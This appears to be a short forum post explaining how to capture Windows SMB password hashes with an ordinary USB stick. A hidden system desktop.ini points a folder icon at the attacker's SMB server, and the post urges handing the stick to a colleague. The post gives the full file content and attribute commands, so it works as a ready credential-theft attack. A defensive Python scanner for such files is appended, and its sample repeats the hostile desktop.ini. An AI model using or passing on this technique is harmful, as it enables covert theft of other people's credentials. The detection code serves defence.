Stealth Mode - Grab SMB hashes without anyone noticing


Bytewolf

After watching the recent episode of Hak5 (2102) on YouTube, I was wondering if this SMB hash grab method can be done without the duck and with a normal USB stick.

The answer is YES.

Bytewolf

@kingbytewolf

-= HowTo do it =-

  • Grab any USB stick you have lying around
  • Create a directory
  • Set the System attribute of this directory with attrib +s <dirname>
  • Create a file called desktop.ini in this directory with the following content:

        [.ShellClassInfo]
        IconResource=\\<YourIP>\tmp\demo.ico
        IconFile=%SystemRoot%\system32\shell32.dll
        IconIndex=-235

  • Save the desktop.ini as a Unicode or UTF-8 file
  • Set the attributes archive, hidden and system with attrib +a +h +s desktop.ini

Preparation -> Done

Put some RFCs in the directory.

Fire up the smbserver and give the Stick to your colleague that really needs these RFCs. >:-D
When he navigates to the drive you should have the hash delivered to your doorstep without any windows popping up.

PoC_AnyUSB.PNG
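
A defensive check for the desktop.ini behaviour described in the post, as an added example that is not part of the original post: it walks a mounted volume and reports every desktop.ini whose values point at a UNC path. The function names and the sample host 192.0.2.10 are assumptions made for this illustration.

```python
import codecs
import os
import re

# A value that starts with \\host\ (optionally prefixed by @) is a UNC path.
UNC_VALUE = re.compile(r"^@?\\\\(?P<host>[^\\/\s]+)[\\/]")

def decode_ini(raw: bytes) -> str:
    """desktop.ini may be saved as 'Unicode' (UTF-16 with BOM) or as UTF-8."""
    if raw.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig", errors="replace")

def find_remote_refs(raw: bytes):
    """Return (section, key, host) for every key whose value is a UNC path."""
    hits, section = [], ""
    for line in decode_ini(raw).splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and not line.startswith(";"):
            key, value = (part.strip() for part in line.split("=", 1))
            match = UNC_VALUE.match(value)
            if match:
                hits.append((section, key, match.group("host")))
    return hits

def scan_tree(root: str):
    """Map each desktop.ini under root that holds a UNC reference to its hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    hits = find_remote_refs(fh.read())
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            if hits:
                report[path] = hits
    return report

# Constructed samples; 192.0.2.10 is a documentation placeholder, not from the post.
SUSPICIOUS = ("[.ShellClassInfo]\r\nIconResource=\\\\192.0.2.10\\tmp\\demo.ico\r\n"
              "IconFile=%SystemRoot%\\system32\\shell32.dll\r\nIconIndex=-235\r\n")
BENIGN = "[.ShellClassInfo]\r\nIconResource=%SystemRoot%\\system32\\shell32.dll,-235\r\n"
```

Run scan_tree against the drive's mount point from a host that does not render folder icons for it. A hit names the remote host the folder would contact, which is also the destination to look for in outbound SMB logs.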
